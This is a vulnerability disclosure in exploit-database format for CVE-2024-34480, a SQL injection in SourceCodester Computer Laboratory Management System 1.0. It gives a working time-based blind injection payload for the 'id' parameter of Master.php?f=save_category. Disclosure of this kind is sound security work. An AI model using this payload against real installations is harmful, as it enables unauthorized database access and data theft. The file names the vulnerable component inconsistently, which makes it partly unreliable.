# Exploit Title: SourceCodester Computer Laboratory Management System 1.0 (view_category.php) - SQL Injection
# Date: 05 May 2024
# Exploit Author: Kavia Baskar
# Vendor Homepage: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html
# Version: v1.0
# CVE: CVE-2024-34480
# Tested on: Windows, XAMPP, Apache, MySQL
[Suggested description]
SourceCodester Computer Laboratory Management System 1.0 allows classes/Master.php id
SQL Injection.
------------------------------------------
[Vulnerability Type]
SQL Injection
------------------------------------------
[Vendor of Product]
SourceCodester
------------------------------------------
[Affected Product Code Base]
SourceCodester Computer Laboratory Management System - 1.0
------------------------------------------
[Affected Component]
The functionality allowing users to modify borrowing records information within the application.
------------------------------------------
[Attack Type]
Local
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Denial of Service]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
To exploit this vulnerability, the following payload can be used to retrieve the data from the database ------WebKitFormBoundaryeubsFzqrWToLg4au
Content-Disposition: form-data; name="id"
' AND (SELECT 6270 FROM (SELECT(SLEEP(5)))jgeq) AND 'QpoF'='QpoF on 'id' parameter on 'http://localhost/php-lms/classes/Master.php?f=save_category'
------------------------------------------
[Reference]
https://www.strongboxit.com/
[Discoverer]
Kavia Baskar with StrongBox IT